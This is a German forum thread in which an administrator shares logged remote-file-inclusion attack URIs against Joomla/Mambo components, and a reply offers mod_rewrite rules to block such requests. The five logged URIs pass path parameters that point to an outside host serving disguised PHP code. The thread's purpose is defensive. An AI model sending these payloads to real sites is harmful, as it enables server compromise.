Zitat von
Neo23x0
Stelle heute wieder einmal starke Angriffe von unterschiedlichsten IPs fest. Habe mein Mod-Security und mein Fail2Ban im Griff und gebe mal die angefragten URIs weiter, falls der ein oder andere dabei eines seiner Module erkennt und keinen Filter benutzt.
Code:
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/469593392871067.gif?
/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/811474392871066.gif?
/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://saintmarkslutheran.com/old/joomla/images/avataras/680067392871069.gif?
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/794283392871065.gif?
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/803546392871064.gif?
Das gute daran ist, dass der Angriff ins Leere läuft, weil es den Avatar nicht mehr gibt. Ganz sicher steckt da auch kein GIF dahinter sondern etwas PHP Code. Um zu testen, ob eigene Installationen anfällig sind, kann man mal ein eigenes PHP-Skript schreiben mit nem phpinfo() und versuchen das so einzuschleusen.
Greets,
Neo
Nun, ein
Code:
RewriteEngine On
RewriteCond %{QUERY_STRING} http\%3A\%2F\%2F [OR]
RewriteCond %{QUERY_STRING} http\:
RewriteRule ^(.*)$ index.php [F,L]
Hilft hier schon viel. 
Ich gehe teilweise noch weiter und lasse sich Angreifer gleich beim BKA vorstellen... (Hier ein Beispiel IP-Bereich!)
Code:
RewriteCond %{REMOTE_ADDR} ^125.62.
RewriteRule .* http://www.bka.de [R=301,L]
LinkBack URL
About LinkBacks
Vermehrte Angriffe
Zitieren
Lesezeichen